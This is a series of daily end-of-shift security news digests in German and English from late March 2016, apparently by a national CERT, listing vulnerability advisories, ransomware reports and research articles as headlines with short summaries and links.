======================= = End-of-Shift report = ======================= Timeframe: Dienstag 29-03-2016 18:00 − Mittwoch 30-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** CareFusion Pyxis SupplyStation System Vulnerabilities *** --------------------------------------------- This medical advisory contains mitigation details for numerous third-party software vulnerabilities in end-of-life versions of CareFusion's Pyxis SupplyStation system. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-16-089-01 *** Websites Hacked Redirect to Porn from PDF / DOC Links *** --------------------------------------------- We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking and SEO poisoning. This time we'll tell you about yet another interesting blackhat SEO attack that we've been watching for the last year. Let's begin with .. --------------------------------------------- https://blog.sucuri.net/2016/03/pdf-doc-urls-redirect-to-porn.html *** CloudFlare <= 1.3.20 - Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8428 *** The Topology of Malicious Activity on IPv4 *** --------------------------------------------- There has been a great deal of academic and industry focus on identifying malicious activity across autonomous systems, and for good reasons. Over 50% of 'good' Internet traffic comes from large, ocean-like ASes pushing content from companies like Netflix, Google, Facebook, Apple and Amazon. However, .. --------------------------------------------- http://www.suchin.co/2016/03/23/Topology-Of-Malicious-Activity/ *** Betriebssystem: OpenBSD 5.9 filtert weitgehend Systemaufrufe *** --------------------------------------------- Die Funktion zum Filtern und Beschränken von Systemaufrufen ist in OpenBSD 5.9 um viele Anwendungen erweitert worden. Außerdem unterstützt das System nun neuere Laptops besser - dank UEFI und WLAN nach 802.11n. --------------------------------------------- http://www.golem.de/news/betriebssystem-openbsd-5-9-filtert-weitgehend-syst… *** Scammers Impersonate ISPs in New Tech Support Campaign *** --------------------------------------------- Scammers devise a new ploy to trick users into thinking their own ISP is warning them about malware. --------------------------------------------- https://blog.malwarebytes.org/threat-analysis/2016/03/scammers-impersonate-… *** [HTB23298]: Multiple Vulnerabilities in CubeCart *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users. --------------------------------------------- https://www.htbridge.com/advisory/HTB23298 *** System Integrity Protection: Apples rootfreie Zone ist gar nicht so rootfrei *** --------------------------------------------- Apple will mit El Capitan verhindern, dass böse Jungs mit Root-Rechten ihr System kaputt machen. Leider hat das auch als Rootless bekannte Sicherheitskonzept viele Lücken und funktioniert deswegen momentan nicht ganz. --------------------------------------------- http://heise.de/-3157130 *** Der Liebling aller Cyber-Kriminellen: Flash *** --------------------------------------------- In den Top-15 der am meisten genutzten Sicherheitslücken finden sich allein 13 Schwachstellen in Flash, berichten die Antiviren-Experten der finnischen Firma F-Secure. --------------------------------------------- http://heise.de/-3157553

1 0

Tageszusammenfassung - Dienstag 29-03-2016
by Daily end-of-shift report 29 Mar '16

29 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 25-03-2016 18:00 − Dienstag 29-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Deutsche Hoster vermehrt im Fokus von Cyberkriminellen *** --------------------------------------------- Immer stärker nutzen Cyberkriminelle die technisch hochentwickelten Internet-Infrastrukturen der ersten Welt. Immer beliebter werden bei ihnen deutsche Hoster zum Verteilen ihrer Schadsoftware. --------------------------------------------- http://heise.de/-3151832 *** Basic Snort Rules Syntax and Usage *** --------------------------------------------- In this series of lab exercises we will demonstrate various techniques in writing Snort rules, from basic rules syntax to writing rules aimed at detecting specific types of attacks. We will also examine some basic approaches .. --------------------------------------------- http://resources.infosecinstitute.com/snort-rules-workshop-part-one/ *** TWSL2016-006: Multiple XSS Vulnerabilities reported for Zen Cart *** --------------------------------------------- Today Trustwave released a vulnerability advisory in conjunction with Zen Cart. Researchers from the SpiderLabs Research team at Trustwave recently found multiple Cross-Site Scripting (XSS) vulnerabilities in the popular online open source shopping .. --------------------------------------------- https://www.trustwave.com/Resources/SpiderLabs-Blog/TWSL2016-006--Multiple-… *** CVE-2016-1010 (??? - Flash up to 20.0.0.306) and Exploit Kits *** --------------------------------------------- http://malware.dontneedcoffee.com/2016/03/flash-up-to-2000306.html *** Neue Infektions-Masche: Erpressungs-Trojaner missbraucht Windows PowerShell *** --------------------------------------------- Die neu entdeckte Ransomware PowerWare bemächtigt sich der Windows PowerShell, um Computer zu infizieren und Daten zu verschlüsseln. --------------------------------------------- http://heise.de/-3151892 *** Every Tool in the Tool Box *** --------------------------------------------- When I teach people about reverse engineering, I often hear the following statement: "I got the right answer, but I cheated to get it". They are typically talking about using dynamic analysis to get an answer versus statically analyzing .. --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/Every-Tool-in-the-Tool-Box/ *** DSA-3532 quagga - security update *** --------------------------------------------- Kostya Kortchinsky discovered a stack-based buffer overflowvulnerability in the VPNv4 NLRI parser in bgpd in quagga, a BGP/OSPF/RIProuting daemon. A remote attacker can exploit this flaw to cause adenial of service (daemon crash), or potentially, execution of arbitrarycode, if bgpd is configured with BGP peers enabled for VPNv4. --------------------------------------------- https://www.debian.org/security/2016/dsa-3532 *** Improving Bash Forensics Capabilities *** --------------------------------------------- Bash is the default user shell in most Linux distributions. In case of incidents affecting a UNIX server, they are chances that a Bash shell will be .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20887 *** Life After the Isolated Heap *** --------------------------------------------- Over the past few months, Adobe has introduced a number of changes to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs .. --------------------------------------------- http://googleprojectzero.blogspot.com/2016/03/life-after-isolated-heap.html *** APPLE-SA-2016-03-28-1 OS X: Flash Player plug-in blocked *** --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Mar/msg00007.ht… *** DSA-3533 openvswitch - security update *** --------------------------------------------- Kashyap Thimmaraju and Bhargava Shastry discovered a remotelytriggerable buffer overflow vulnerability in openvswitch, a productionquality, multilayer virtual switch implementation. Specially craftedMPLS packets could overflow .. --------------------------------------------- https://www.debian.org/security/2016/dsa-3533 *** "Collecting Serial Data for ICS Network Security Monitoring" *** --------------------------------------------- Below is a postby SANS ICS515 - ICS Active Defense and Incident Response instructor Mark Bristow. Adversaries across the capability spectrum are increasingly targeting Industrial Control System (ICS) environments. Malware such as .. --------------------------------------------- http://ics.sans.org/blog/2016/03/29/collecting-serial-data-for-ics-network-… *** Why PCI DSS cannot replace common sense and holistic risk assessment *** --------------------------------------------- Cybersecurity compliance is not designed to eliminate data breaches or stop cybercrime. --------------------------------------------- https://www.htbridge.com/blog/why-pci-dss-cannot-replace-common-sense-and-h… *** Printers all over the US 'hacked' to spew anti-Semitic fliers *** --------------------------------------------- Andrew 'Weev' Auernheimer, one of the two men who were prosecuted and convicted for harvesting e-mails and authentication IDs of 114,000 early-adopters of Apple's iPad from AT&T's .. --------------------------------------------- https://www.helpnetsecurity.com/2016/03/29/printers-us-hacked-anti-semitic-… *** Xen Security Advisory 172 (CVE-2016-3158, CVE-2016-3159) - broken AMD FPU FIP/FDP/FOP leak workaround *** --------------------------------------------- There is a workaround in Xen to deal with the fact that AMD CPUs dont load the x86 registers FIP (and possibly FCS), FDP (and possibly FDS), and FOP from memory (via XRSTOR or FXRSTOR) when there is no pending unmasked exception. (See XSA-52.) However, this workaround does not cover all possible input cases. --------------------------------------------- http://lists.xen.org/archives/html/xen-announce/2016-03/msg00001.html *** Google-Entwickler: NPM-Malware könnte sich als Wurm verbreiten *** --------------------------------------------- Wegen einiger Design-Prinzipien der Node-Paktverwaltung NPM könne sich ein schadhaftes Modul wie ein Wurm im gesamten System verbreiten, warnt ein Google-Entwickler. Gegen die Sicherheitslücke hilft vorerst nur Handarbeit. --------------------------------------------- http://www.golem.de/news/google-entwickler-npm-malware-koennte-sich-als-wur… *** Petya: Den Erpressungs-Trojaner stoppen, bevor er die Festplatten verschlüsselt *** --------------------------------------------- Die Ransomware Petya zielt auf deutschsprachige Opfer und sorgt dafür, dass deren Rechner nicht mehr starten. Der Trojaner verschlüsselt ausserdem die Festplatten, das kann man aber verhindern, wenn man ihn rechtzeitig stoppt. --------------------------------------------- http://heise.de/-3153388 *** Lücke in populärer Anrufer-ID-App Truecaller legt Nutzerdaten offen *** --------------------------------------------- http://derstandard.at/2000033814462

1 0

Tageszusammenfassung - Freitag 25-03-2016
by Daily end-of-shift report 25 Mar '16

25 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 24-03-2016 18:00 − Freitag 25-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** DFN-CERT-2016-0510/">Xen, QEMU: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes mit den Rechten des Dienstes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0510/ *** USB Trojan Hides In Portable Applications, Targets Air-Gapped Systems *** --------------------------------------------- A Trojan program, dubbed USB Thief by researchers at security firm ESET, infects USB drives that contain portable installations of popular applications such as Firefox, NotePad++, or TrueCrypt, and it also seems to be designed to steal information from so-called air-gapped computers. "In the case we .. --------------------------------------------- https://it.slashdot.org/story/16/03/24/184255/usb-trojan-hides-in-portable-… *** F5: sol93122894: OpenSSL vulnerability CVE-2016-0705 *** --------------------------------------------- OpenSSL handling of malformed DSA private keys may cause memory corruption and possibly stop the handling process. --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/93/sol93122894.html *** Tenable: [R1] Log Correlation Engine (LCE) 4.8.0 Updates Libxml2 *** --------------------------------------------- The Log Correlation Engine (LCE) uses the third-party Libxml2 library for some XML parsing routines. A vulnerability was found and patched in Libxml2 recently. Tenable has not evaluated this vulnerability beyond acknowledging that user-supplied XML .. --------------------------------------------- http://www.tenable.com/security/tns-2016-06 *** Cogent DataHub Elevation of Privilege Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a privilege elevation vulnerability in the Cogent DataHub application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01 *** SQL Injection Cheat Sheet *** --------------------------------------------- What is an SQL Injection Cheat Sheet? An SQL injection cheat sheet is a resource in which you can find detailed technical information about the many different variants of the SQL Injection vulnerability. This cheat sheet is of good .. --------------------------------------------- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ *** Erpressungstrojaner: "Petya" befällt deutschsprachiges Gebiet *** --------------------------------------------- Die Ransomware verbreitet sich über Dropbox und zwingt Windows-User, Geld für die Entsperrung ihres Computers zu zahlen. --------------------------------------------- http://derstandard.at/2000033657066

1 0

Tageszusammenfassung - Donnerstag 24-03-2016
by Daily end-of-shift report 24 Mar '16

24 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 23-03-2016 18:00 − Donnerstag 24-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Cisco IOS and IOS XE and Cisco Unified Communications Manager Software Session Initiation Protocol Memory Leak Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** IBM Security Bulletin: IBM Forms Server vulnerability identified in Webform Server (CVE-2016-0223) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21977574 *** Security Bulletin: Vulnerabilities in OpenSSL affect IBM Flex System FC5022 16Gb SAN and EN4023 10Gb Scalable Switches *** --------------------------------------------- http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099273 *** Security Bulletin: Vulnerabilities in OpenSSL affect QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module for BladeCenter *** --------------------------------------------- http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099272 *** Cisco Network Convergence System 6000 Series Routers SCP and SFTP Modules Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Zyxel MAX3XX Series Wimax CPEs Hardcoded Root Password *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030135 *** Measuring SMTP STARTTLS Deployment Quality *** --------------------------------------------- At Yahoo, our users send and receive billions of emails everyday. We work to make Yahoo Mail easy to use, personalized, and secure for our hundreds of millions of users around the world. In line with our efforts to protect our users .. --------------------------------------------- https://yahoo-security.tumblr.com/post/141495385400/measuring-smtp-starttls… *** Kerberos Kadmind Null Pointer Dereference in process_db_args() Lets Remote Authenticated Users Execute Arbitrary Code on the Target System *** --------------------------------------------- http://www.securitytracker.com/id/1035399 *** CA Single Sign-On Agent Input Validation Flaws Let Remote Users Obtain Potentially Sensitive Information and Cause Denial of Service Conditions *** --------------------------------------------- http://www.securitytracker.com/id/1035389 *** Researchers find hole in SIP, Apple's newest protection feature *** --------------------------------------------- System Integrity Protection pwned Security researchers have discovered a vulnerability that creates a means for hackers to circumvent Apple's newest protection .. --------------------------------------------- www.theregister.co.uk/2016/03/24/macosx_security_bypass/ *** Nemucods CRYPTED Ransomware Can Be Neutralized with This Decrypter *** --------------------------------------------- Victims that had their computers locked by a ransomware that uses the CRYPTED file extension can now free their files using a special decrypter created by Emsisoft security .. --------------------------------------------- http://news.softpedia.com/news/nemucod-s-crypted-ransomware-can-be-neutrali… *** RCE flaw affects DVRs sold by over 70 different vendor *** --------------------------------------------- RSA security researcher Rotem Kerner has discovered a remote code execution vulnerability that affects digital video recorders (DVRs) sold by more than 70 different vendors around the world. --------------------------------------------- https://www.helpnetsecurity.com/2016/03/24/rce-flaw-dvrs-70-vendors/ *** Erpressungs-Trojaner Petya riegelt den gesamten Rechner ab *** --------------------------------------------- Eine neue Ransomware hat es aktuell auf deutschsprachige Windows-Nutzer abgesehen. Petya wird über Dropbox verteilt und manipuliert die Festplatte, wodurch das Betriebssystem nicht mehr ausgeführt werden kann. --------------------------------------------- http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-d… *** VU#279472: Granite Data Services AMF framework fails to properly parse XML input containing a reference to external entities *** --------------------------------------------- http://www.kb.cert.org/vuls/id/279472 *** RedDoor: Erpresser drohen mit DDoS-Attacken auf deutsche Webseiten *** --------------------------------------------- Zahlt uns 3 Bitcoin oder wir legen eure Webseite lahm – mit dieser Drohung erpresst eine Gruppe gerade Firmen in Deutschland, Österreich und der Schweiz. Angeblich soll es sich dabei allerdings um einen Bluff handeln. --------------------------------------------- http://heise.de/-3151565 *** Emergency Java Patch Re-Issued for 2013 Vulnerability *** --------------------------------------------- Oracle yesterday released an emergency patch for a Java vulnerability that was improperly patched in 2013. --------------------------------------------- http://threatpost.com/emergency-java-patch-re-issued-for-2013-vulnerability…

1 0

Tageszusammenfassung - Mittwoch 23-03-2016
by Daily end-of-shift report 23 Mar '16

23 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 22-03-2016 18:00 − Mittwoch 23-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** What was all that about a scary iMessage flaw? Your three-minute guide *** --------------------------------------------- On Sunday, we were warned that hackers could read our iMessages texts, photos and videos. Should I be worried? As it turns out: no. If youre even a little curious about cryptography and secure programming, though, it should interest and amuse you. --------------------------------------------- http://www.theregister.co.uk/2016/03/23/imessages_flaw_details/ *** Google publishes list of Certificate Authorities it doesnt trust *** --------------------------------------------- Thawte experiment aims to expose issuers of dodgy creds Googles announced another expansion to the security information offered in its transparency projects: its now going to track certificates you might not want to trust. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/03/23/google_now_… *** Abusing Oracles, (Wed, Mar 23rd) *** --------------------------------------------- No, no this has nothing to do with Oracle Corporation! This diary is about abusing encryption and decryption Oracles. First a bit of a background story. Most of the days I do web and mobile application penetration testing. While technical vulnerabilities, such as SQL Injection, XSS and similar are still commonly found, in last couple of years I would maybe dare to say that the Direct Object Reference (DOR) vulnerabilities have become prevalent. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20875&rss *** Libmcrypt - Incorrect S-Boxes for GOST cipher (2008, unfixed) *** --------------------------------------------- PHP just decided to abandon the trash fire that is libmcrypt. There were (are?) still other projects that use(d) it, so Im sharing this link in the interest of strongly encouraging projects to drop it like a lead balloon. This is far from the only problem with it ... --------------------------------------------- https://www.reddit.com/r/netsec/comments/4bl8xu/libmcrypt_incorrect_sboxes_… *** Microsoft Adds New Feature in Office 2016 That Can Block Macro Malware *** --------------------------------------------- Microsoft is finally addressing the elephant in the room in terms of security for Office users and has announced a new feature in the Office 2016 suite that will make it harder for attackers to exploit macro malware. ... Sysadmins can now block macros that connect to the Internet ... "This feature can be controlled via Group Policy and configured per application," Microsoft explains. "It enables enterprise administrators to block macros from running in Word, Excel and PowerPoint --------------------------------------------- http://news.softpedia.com/news/microsoft-adds-new-feature-in-office-2016-th… *** GroupWise 2014 R2 Hot Patch 1 - Windows Full Multilingual *** --------------------------------------------- Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details. --------------------------------------------- https://download.novell.com/Download?buildid=AA7ZB93KAjc~ *** GroupWise 2014 R2 Hot Patch 1 - Windows Client Multilingual *** --------------------------------------------- Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details. --------------------------------------------- https://download.novell.com/Download?buildid=dxd3rzvGvig~ *** GroupWise 2014 R2 Hot Patch 1 - Linux Full Multilingual *** --------------------------------------------- Abstract: GroupWise 2014 R2 Hot Patch 1 has been released. Be aware that there are security fixes in this release. Please see the Security section for details. --------------------------------------------- https://download.novell.com/Download?buildid=Wxix0_fCdmI~ *** sol51518670: Linux kernel vulnerability CVE-2015-2922 *** --------------------------------------------- The ndisc_router_discovery function in net/ipv6/ndisc.c in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in the Linux kernel before 3.19.6 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message. (CVE-2015-2922) --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/51/sol51518670.html *** F5 Security Advisory: Apache Tomcat 6.x vulnerabilities CVE-2015-5174, CVE-2015-5345, CVE-2016-0706, and CVE-2016-0714 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/30/sol30971148.html?… --------------------------------------------- *** Cisco Security Advisories *** --------------------------------------------- *** Cisco IOS and NX-OS Software Locator/ID Separation Protocol Packet Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco IOS and IOS XE Software Smart Install Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco IOS Software Wide Area Application Services Express Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco IOS and IOS XE Software Internet Key Exchange Version 2 Fragmentation Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco IOS and IOS XE Software DHCPv6 Relay Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** ZDI-16-210: IBM Informix portmap Service Privilege Escalation Vulnerability *** --------------------------------------------- This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- www.zerodayinitiative.com/advisories/ZDI-16-210/ *** ZDI-16-209: IBM Informix nsrexecd Service Privilege Escalation Vulnerability *** --------------------------------------------- This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-209/ *** ZDI-16-208: IBM Informix nsrd Service Privilege Escalation Vulnerability *** --------------------------------------------- This vulnerability allows local users to execute arbitrary code on vulnerable installations of IBM Informix. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-208/

1 0

Tageszusammenfassung - Dienstag 22-03-2016
by Daily end-of-shift report 22 Mar '16

22 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 21-03-2016 18:00 − Dienstag 22-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Moodle Bugs Let Remote Authenticated Users Obtain Potentially Sensitive Information and Bypass Security Restrictions and Remote Users Conduct Cross-Site Scripting and Cross-Site Request Forgery Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035333 *** Libxml2 Memory Allocation Error in xmlStringGetNodeList() Lets Remote Users Consume Excessive Memory Resources *** --------------------------------------------- http://www.securitytracker.com/id/1035335 *** D-Link DWR-932 Authentication Bypass / Password Disclosure *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030115 *** AsusTEK asio.sys MSR Manipulation *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030116 *** Google slings critical patch at exploited Linux kernel root hole *** --------------------------------------------- Android re-installation ahoy to sink privilege elevation that opens avenue for rooting apps Google has shipped an out-of-band patch for Android shuttering a bug that is under active exploitation to root devices. --------------------------------------------- www.theregister.co.uk/2016/03/22/google_slings_critcial_patch_at_exploited_… *** IBM Security Bulletin: Multiple Vulnerabilities in Oracle Outside In Technology affects IBM Rational DOORS Next Generation *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21978747 *** IBM Security Bulletin: Lotus Quickr 8.5 for WebSphere Portal January 2016 CPU (CVE-2016-0448) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21977579 *** Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM BladeCenter Advanced Management Module (AMM) (CVE-2015-7575) *** --------------------------------------------- http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5099195 *** IBM Security Bulletin: Vulnerability in Apache Cordova affects IBM MobileFirst Platform Foundation (CVE-2015-5256) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg2C1000109 *** Security Bulletin: Vulnerability in OpenSSH affects IBM Flex System FC3171 8Gb SAN Switch and SAN Pass-thru, QLogic 8Gb Intelligent Pass-thru Module and SAN Switch Module and QLogic Virtual Fabric Extension Module for IBM BladeCenter (CVE-2015-5600) *** --------------------------------------------- http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098977 *** Samba-Entwickler warnen vor Lücke auch in Windows *** --------------------------------------------- Badlock heißt eine kritische Sicherheitslücke, die Samba-Entwickler in ihrer eigenen Software, aber auch in Windows entdeckt haben. Sie warnen die Betreiber solcher Server eindringlich, am 12. April Zeit für das Einspielen von Patches einzuplanen. --------------------------------------------- http://heise.de/-3148379 *** Deluge of Apple Patches Fix iMessage Crypto Bug, Much More *** --------------------------------------------- Apple deployed patches for nearly all of its products, including Safari, OS X, iOS, Apple TV's tvOS, and watchOS on Monday. --------------------------------------------- http://threatpost.com/deluge-of-apple-patches-fix-imessage-crypto-bug-much-… *** "E-ISAC and SANS Report On The Ukrainian Grid Attack" *** --------------------------------------------- Yesterday the SANS ICS team released its Defense Use Case (DUC) #5 analyzing the cyber-attack that impacted Ukraine on December 23, 2015. The paper is written from the perspective of what lessons that can be learned from the event. The .. --------------------------------------------- http://ics.sans.org/blog/2016/03/22/e-isac-and-sans-report-on-the-ukrainian… *** A look at Locky ransomware *** --------------------------------------------- The Locky ransomware was first spotted in the wild last month in February 2016. Locky came to limelight when it hit the Hollywood Hospital last month causing the hospital to pay bitcoins worth 17,000$ USD in ransom. Locky is known to .. --------------------------------------------- http://research.zscaler.com/2016/03/a-look-at-locky-ransomware.html

1 0

Tageszusammenfassung - Montag 21-03-2016
by Daily end-of-shift report 21 Mar '16

21 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 18-03-2016 18:00 − Montag 21-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Palo Alto Networks: VPN-Webinterface mit überlangen Benutzernamen angreifbar *** --------------------------------------------- Ein Sicherheitsforscher der Heidelberger Firma ERNW hat eine Remote-Code-Execution-Lücke auf einer Palo-Alto-Appliance gefunden. Verantwortlich dafür war ein fehlender Längencheck bei der Eingabe des Benutzernamens. --------------------------------------------- http://www.golem.de/news/palo-alto-networks-vpn-webinterface-mit-ueberlange… *** IBM Security Bulletin: Cross-site scripting vulnerability in IBM WebSphere Application Server (CVE-2016-0283) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21978293 *** FreeBSD crushes system-crashing bug *** --------------------------------------------- Time to upgrade, Unix-like OS-havers Sysadmins ought to patch their FreeBSD systems after an irritating bug was found in the kernel .. --------------------------------------------- www.theregister.co.uk/2016/03/18/freebsd_bug_patched/ *** Unplanmäßiger Android-Patch und noch einmal Stagefright *** --------------------------------------------- Knapp drei Wochen nach dem planmäßigen März-Update schließt Google eine Sicherheitslücke in Android, mit der sich Angreifer Root-Rechte erschleichen können. Derweil wurde ein weiterer Stagefright-Exploit bekannt. --------------------------------------------- http://www.heise.de/newsticker/meldung/Unplanmaessiger-Android-Patch-und-no… *** Google offers binary comparison tool BinDiff for free *** --------------------------------------------- In case you missed it, Google announced on Friday that BinDiff, a comparison tool for binary files, can now be downloaded for free. The tool is used to spot differences and similarities in disassembled code, and is helpful for identifying and isolating fixes for vulnerabilities in vendor-supplied .. --------------------------------------------- https://www.helpnetsecurity.com/2016/03/21/binary-comparison-tool-bindiff-f… *** Exploiting a Leaked Thread Handle *** --------------------------------------------- Once in awhile you'll find a bug that allows you to leak a handle opened in a privileged process into a lower privileged process. I found just such a bug in the Secondary Logon service on Windows, which was fixed this month as .. --------------------------------------------- http://googleprojectzero.blogspot.co.at/2016/03/exploiting-leaked-thread-ha… *** Erpresser rüsten nach: Verschlüsselungs-Trojaner TeslaCrypt 4.0 gesichtet *** --------------------------------------------- Sicherheitsforscher warnen vor einer neuen Version der Ransomware TeslaCrypt, die Computer infiziert und Daten chiffriert. Für Opfer ist es nun noch schwerer herauszufinden, was mit ihren Dateien passiert ist. --------------------------------------------- http://heise.de/-3145559 *** NIST releases updated telework guidance *** --------------------------------------------- The National Institute of Standards and Technology (NIST) released draft guidance for telework protocol, an update to the federal agencys initial documents drafted in 2009. --------------------------------------------- http://www.scmagazine.com/nist-releases-updated-telework-guidance/article/4… *** iOS URI Schemes Abuse *** --------------------------------------------- A set of URI schemes bugs that lead Safari to crash/freeze. --------------------------------------------- https://github.com/pwnsdx/iOS-URI-Schemes-Abuse-PoC *** OS X Malware Samples Analyzed *** --------------------------------------------- A couple of months ago, as we rang in 2016, we thought it would be interesting to take a quick look back at some OSX malware from 2015 and 2014. As reported by the team at Bit9+Carbon Black [1], 2015 marked 'the most prolific year in history for OS X .. --------------------------------------------- https://www.alienvault.com/open-threat-exchange/blog/os-x-malware-samples-a… *** Office für Mac: Microsoft veröffentlicht Sicherheits-Updates *** --------------------------------------------- Microsoft hat Updates für die OS-X-Versionen von Office 2011 und Office 2016 veröffentlicht, die eine kritische Schwachstelle schließen sollen. Die neue Version der Office-Suite baut die Sprachen-Unterstützung aus. --------------------------------------------- http://heise.de/-3146389

1 0

Tageszusammenfassung - Freitag 18-03-2016
by Daily end-of-shift report 18 Mar '16

18 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 17-03-2016 18:00 − Freitag 18-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Online Banking Threats in 2015: The Curious Case of DRIDEX's Prevalence *** --------------------------------------------- The thing about takedowns is that these do not necessarily wipe out the cybercriminal operations. In 2014, the ZeroAccess takedown has affected the botnet's click fraud operation, but its infections continued to soar. DRIDEX's .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/curious-case-dri… *** Mitre Takes On Critics, Set To Revamp CVE Vulnerability Reporting *** --------------------------------------------- Mitre Corporation will introduce a pilot program for classifying CVEs in response to critics who contend the agency is failing to keep pace with a massive influx CVE number requests. --------------------------------------------- http://threatpost.com/mitre-takes-on-critics-set-to-revamp-cve-vulnerabilit… *** Server Security: Indicators of Compromised Behavior with OSSEC *** --------------------------------------------- We leverage OSSEC extensively here at Sucuri to help monitor and protect our servers. If you are not familiar with OSSEC, it is an open source Intrusion Detection System (HIDS); it has a powerful correlation and analysis engine that integrates log analysis, file integrity monitoring, rootkit detection, .. --------------------------------------------- https://blog.sucuri.net/2016/03/server-security-anomaly-behaviour-with-osse… *** No mas, Samas: What's in this ransomware's modus operandi? *** --------------------------------------------- We've seen how ransomware managed to become a threat category that sends consumers and enterprise reeling when it hits them. It has become a high-commodity malware that is used as payload to spam email, macro malware, and exploit kit campaigns. It also digs onto victims' pockets in exchange for .. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/03/17/no-mas-samas-whats-in-t… *** ABB Panel Builder 800 DLL Hijacking Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a DLL Hijacking vulnerability in the ABB Panel Builder 800 Version 5.1 application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-077-01 *** Apache ActiveMQ Input Validation Flaw Lets Remote Conduct Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035328 *** Apache ActiveMQ Lets Remote Users Conduct Clickjacking Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035327 *** Android adware infiltrates devices' firmware, Trend Micro apps *** --------------------------------------------- Dubbed Gmobi by Dr. Web researchers, the malware comes in the form of a software development kit (SDK), and has been found in several legitimate applications by well-known companies, as well as in firmware for nearly 40 mobile .. --------------------------------------------- https://www.helpnetsecurity.com/2016/03/18/android-adware-infiltrates-devic… *** SSA-151221 (Last Update 2016-03-18): Incorrect File Permissions in APOGEE Insight *** --------------------------------------------- 